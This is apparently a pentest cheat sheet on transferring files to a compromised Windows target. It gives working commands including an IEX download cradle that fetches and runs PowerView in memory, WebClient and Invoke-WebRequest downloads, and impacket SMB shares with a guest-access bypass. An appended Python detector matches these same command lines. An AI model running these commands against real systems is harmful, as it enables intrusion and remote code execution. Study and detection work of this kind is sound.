Target: Windows
File Hash
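After every transfer, compute the file's MD5 checksum on both the target and attack hosts and confirm the two values match, which shows the file wasn't corrupted or altered in transit. It's a good habit for file integrity checks. MD5 catches accidental corruption but is not collision-resistant; Get-FileHash uses SHA256 when -Algorithm is omitted.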
# Bash
md5sum filename
# PowerShell
Get-FileHash filename -Algorithm MD5
# Cmd
certutil -hashfile filename MD5
Transfer Techniques
Base64 Encode & Decode
# Base64-encode the file (Bash, source host)
cat filename | base64 -w 0; echo
# Decode the string and write the file (PowerShell, Windows target)
[IO.File]::WriteAllBytes("C:\Users\Public\filename", [Convert]::FromBase64String("BASE64-ENCODED-STRING"))
Fileless (Into Memory)
Host the file with a Python HTTP server, then:
IEX (New-Object Net.WebClient).DownloadString('http://ip:port/PowerView.ps1')
DownloadFile Method
Host the file with a Python HTTP server, then:
(New-Object Net.WebClient).DownloadFile('http://ip:port/filename','C:\Users\Public\Desktop\filename')
(New-Object Net.WebClient).DownloadFileAsync('http://ip:port/filename', 'C:\Users\Public\Desktop\filename')
Invoke-WebRequest (wget like)
The aliases for Invoke-WebRequest are curl, wget and iwr.
Host the file with a Python HTTP server, then:
Invoke-WebRequest http://ip:port/filename -OutFile filename
# Add '-UseBasicParsing' when the Internet Explorer first-launch configuration has not been completed
SMB Share Method
# Create an SMB server (attack host)
python3 /opt/impacket/build/scripts-3.12/smbserver.py share -smb2support .
# Copy the file from the share (Windows target)
copy \\TUN0\share\filename .
Bypass Blocked Unauthenticated Guest Access
In this scenario, we can create the SMB share with credentials:
python3 /opt/impacket/build/scripts-3.12/smbserver.py share -smb2support . -user rezydev -password rezydev
# Mount the SMB Share
net use n: \\TUN0\share /user:rezydev rezydev
copy n:\filename .
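From the defender's side, each technique on this page leaves a recognizable command line in process-creation telemetry. The following is an added example, not part of the original page: a small Python matcher run over constructed command lines (the rule names, the 192.0.2.10 host, the credentials and the sample events are all made up for illustration).

```python
import re

# Constructed command lines shaped like process-creation telemetry
# (Windows Event ID 4688 / Sysmon Event ID 1). Host, paths and creds are made up.
SAMPLE_EVENTS = [
    r"powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8000/PowerView.ps1')",
    r"powershell.exe (New-Object Net.WebClient).DownloadFile('http://192.0.2.10:8000/f.exe','C:\Users\Public\f.exe')",
    r"powershell.exe iwr http://192.0.2.10:8000/f.exe -OutFile f.exe -UseBasicParsing",
    r'powershell.exe [IO.File]::WriteAllBytes("C:\Users\Public\f", [Convert]::FromBase64String("QUJD"))',
    r"cmd.exe /c net use n: \\192.0.2.10\share /user:svc Example123",
    r"cmd.exe /c copy \\192.0.2.10\share\f.exe .",
    r"powershell.exe Get-FileHash report.docx -Algorithm MD5",  # benign control
]

# Hypothetical rule names; one pattern per transfer technique on this page.
RULES = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in [
    ("ps-download-cradle", r"\b(IEX|Invoke-Expression)\b.*DownloadString\("),
    ("ps-webclient-file",  r"Net\.WebClient\)?\.DownloadFile(Async)?\("),
    ("ps-iwr-outfile",     r"\b(Invoke-WebRequest|iwr|wget|curl)\b.*\s-OutFile\b"),
    ("ps-base64-to-disk",  r"WriteAllBytes\(.*FromBase64String\("),
    ("smb-net-use-creds",  r"\bnet\s+use\b.*\\\\[^\\\s]+\\\S+.*\s/user:"),
    ("smb-unc-copy",       r"\bcopy\s+\\\\[^\\\s]+\\"),
]]


def classify(cmdline):
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events):
    """Return (event, matched_rules) pairs for events that hit at least one rule."""
    return [(e, hits) for e in events if (hits := classify(e))]


if __name__ == "__main__":
    for event, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):22} {event}")
```

Matching is case-insensitive because PowerShell and cmd.exe ignore case in cmdlet and command names; the Get-FileHash line is included as a benign control that no rule should flag.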